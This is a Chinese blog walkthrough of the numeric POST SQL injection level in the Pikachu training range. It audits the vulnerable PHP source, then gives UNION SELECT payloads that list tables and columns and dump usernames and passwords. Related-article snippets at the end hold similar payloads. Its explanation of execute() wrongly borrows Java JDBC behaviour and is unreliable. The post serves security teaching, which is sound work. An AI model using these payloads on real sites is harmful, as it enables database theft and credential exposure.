pikachu靶场第十六关——sqli数字型注入(post)(附代码审计)

最新推荐文章于 2024-07-16 15:11:55 发布
最新推荐文章于 2024-07-16 15:11:55 发布
阅读量1.1k 收藏 26
点赞数 25
分类专栏: pikachu靶场 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzasts/article/details/137755025
版权

Sql Inject(SQL注入)概述

        在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。
一个严重的SQL注入漏洞,可能会直接导致一家公司破产!
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。

在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:
1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
2.使用参数化(Parameterized Query 或 Parameterized Statement);
3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!

源代码:

if(isset($_POST['submit']) && $_POST['id']!=null){
    //这里没有做任何处理,直接拼到select里面去了,形成Sql注入
    $id=$_POST['id'];
    $query="select username,email from member where id=$id";
    $result=execute($link, $query);
    //这里如果用==1,会严格一点
    if(mysqli_num_rows($result)>=1){
        while($data=mysqli_fetch_assoc($result)){
            $username=$data['username'];
            $email=$data['email'];
            $html.="<p class='notice'>hello,{$username} <br />your email is: {$email}</p>";
        }
    }else{
        $html.="<p class='notice'>您输入的user id不存在,请重新输入!</p>";
    }
}

我们一行一行来看

if(isset($_POST['submit']) && $_POST['id']!=null)

        判断输入的id是否为空,判断按键是否按下

 $id=$_POST['id'];

定义了一个函数id,并将输入的id的值保存在了里面。

$query="select username,email from member where id=$id";

这是查询函数,也就是一会要执行的命令,即从username、email表中查询id为$id的值。

漏洞就是在这里产生的。

从输入到查询,并没有进行过任何的处理,这就相当于将数据库的查询权限开放给了所有人。

我们一会将说,接着看吧。

$result=execute($link, $query);

execute():几乎可以执行任何SQL语句,返回值是boolean值,表明该SQL语句是否返回ResultSet对象

boolean值:

true:使用getResultSet()方法获取返回的ResultSet对象
false:使用getUpdateCount()方法获取返回所影响的行数

if(mysqli_num_rows($result)>=1)

mysql_num_rows是PHP语言的中的函数,其表示取得结果集中行的数目。

若是大于等于1,则执行后续代码

 while($data=mysqli_fetch_assoc($result))

mysql_fetch_assoc是一个计算机函数,功能是从结果集中取得一行作为关联数组。返回根据从结果集取得的行生成的关联数组,如果没有更多行,则返回 false。

后面的代码就不细说了。

让我们来看看怎么拿下这个漏洞!

试了一下,网页上只能选择选项。

抓包看看。

ok,试着在id处将查询语句闭合了。

先试试单引号。

$query="select username,email from member where id=$id";

失败了吗?并没有,我们已经成功在后台执行了一次查询,只是报错了,因为数据库里没有标号为1' 的值。

让我们看看能不能输入命令,最简单的就是判断1=1

成功了!

ok,我们开始将深入了!

order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错

现在我们知道了字段长度为二,接下来可以用联合注入查询

利用 union select 联合查询,即可探测到可利用的字段数

id=1 union select 1,2 --+

id=1 union select database(),version() --+

不想看到上面这一条的,可以将id改为-1。

?id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'--+

?id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=1 union select 1,group_concat(username,':',password) from pikachu.users--+

就酱!

hacker苏序
关注
  • 25
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MySQL数据库SQL注入靶场sqli通实战(靶场安装包)
悦分享
10-20 251
SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。带入执行的参数能够可控;拼接的SQL语句能够带入数据库中,并执行;SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。
我的白帽之路-SQL注入数字型注入sqli-labs Less-2】
Offsett的博客
02-27 370
我的白帽之路
PIKACHU-SQL注入(1-5)
koala_king的博客
03-03 169
sql
Pikachu SQL注入数字型注入
SS_liang的博客
01-11 1521
我们在点击选择框里面的123456时,url没有变化,不是get请求,我们直接抓包试试:1. GET请求:GET请求用于从服务器获取资源,通过将参数加在URL的末尾来传递数据。这些参数以键值对的形式出现在URL的查询字符串中,例如:http://example.com?GET请求的特点包括:- 数据以明文形式出现在URL中,可以被缓存、书签等记录。- 传输的数据量有限,受URL长度限制。- 数据通过URL传输,对于敏感信息不太安全。- GET请求可被浏览器主动缓存。
Pikachu靶场-SQL注入-数字型注入post)过步骤
weixin_44257023的博客
07-16 1004
Pikachu靶场-SQL注入-数字型注入post)过步骤,重点是学习方法,当然有很多方法用工具什么的这里就是手工注入
pikachu靶场sql注入
qq_74825121的博客
01-21 2585
pikachu靶场sql注入
网络安全pikachu数字型注入post)实战
weixin_44255593的博客
02-25 1295
1、打开pikachu数字型注入post靶场,随机选择一个数字进行查询,并开启BURP进行抓包。 2、使用UNION联合查询法判断字段数,测试在id=1后面构造order by 1和order by 2时没有报错,当个到第三个时回显报错,所以可以判断字段数为2个字段。 id=1 order by 1 &submit=%E6%9F%A5%E8%AF%A2 id=1 order by 3 &submit=%E6%9F%A5%E8%AF%A2 3、通过联合查询法构造un.
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
pikachu靶场SQL注入.docx
09-13
一、数字型注入POST数字型注入是指在Web应用程序中,输入参数为数字类型的注入。通过对参数的tampering,攻击者可以访问数据库中的敏感信息。数字型注入的判断步骤如下: 1. id=1 后面加 ‘ “ ) “ )来查询...
pikachu靶场全部通.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场全通教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场环境
02-12
"pikachu靶场环境" 是一个专门为网络安全学习和实践设计的平台,它为用户提供了一个安全的、受控的环境来模拟真实的网络攻击与防御场景。在这个环境中,参与者可以学习和提升自己的渗透测试技巧,同时了解如何加固...
pikachu sql注入手册
tj2718647721的博客
08-07 742
手动方式:手工构造SQL语句进行注入点发现自动方式:采用自动扫描工具,自动进行注入点发现。
MySQL-数字类型自增是真的坑
weixin_45893571的博客
05-06 1246
在进行表结构设计时,数字类型是最为常见的类型之一,但要用好数字类型并不如想象得那么简单,比如: 怎么设计一个互联网海量并发业务的自增主键?用 INT 就够了? 怎么设计账户的余额?用 DECIMAL 类型就万无一失了吗? 以上全错! 数字类型看似简单,但在表结构架构设计中很容易出现上述“设计上思考不全面”的问题(特别是在海量并发的互联网场景下) 数字类型 整数类型 MySQL 数据库支持 SQL 标准支持的整型类型:INT、SMALLINT。此外,MySQL 数据库也支持诸如 TINYINT、M
mysql 数字注入_SQL数字型注入(mysql数据库)
weixin_33196555的博客
01-19 560
好像并没有什么特别的东西。用工具进行全站扫描,查看是否有其他页面存在。结果我们一共扫出了三个页面,一个静态页面,两个动态页面。排除静态页面,login.php是我们刚刚看见的后台登陆页面,我们打开这个new_list.php看看。结果我们可以发现,一片空白,也就是说我们在向服务器请求获取页面的时候,页面没有获取成功,也就是差参数。盲猜试试id=1,这个时候发现页面正常显示了。猜测该注入数字型的注...
SQLi 数字型注入
Lu__xiao的博客
02-17 3391
使用SQLi-Labs网站的Less-2为入口,利用联合查询(union select)的方式实施SQL注入,获取SQLi-Labs网站的登陆用户名和密码 环境: Windows 10、火狐浏览器、HackBar、SQLi-Labs 进入Less-2 2. 使用HackBar 先定一个GET参数 http://192.168.5.145/sql/Less-2/?id=1 页面回显id=1的用户名和密码 3. 判断注入点 (1)http://192.168.5.1.
sqli-labs练习(第二)——数字型
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-17 1738
1、先判断是字符型还是数字型。 172.16.11.222/sqli-labs/Less-2/?id=1 id=2-1 与 id=1的结果一样,说明是数字型。 2、确认字段位数 172.16.11.222/sqli-labs/Less-2/?id=1 order by 3 一共3位 3、确认占位信息 172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,3 --+ 4、找库名 http://172.16.11.222/sqli-labs/Less-
SQL注入漏洞 | 数字型
weixin_52116519的博客
11-28 791
SQL注入漏洞 | iwebsec。
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
最新发布
haiyunan的博客
07-16 534
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
pikachu数字型注入(post)
04-10
这个问题是于使用Python中的字母、数字和下划线命名变量的语法问题。具体来说,'pikachu'是一个以字母开头的变量名,而'\xe6\x95\xb0\xe5\xad\x97\xe5\x9e\x8b\xe6\xb3\xa8\xe5\x85\xa5(post)'可能是一个函数或方法的参数名称。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hacker苏序

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值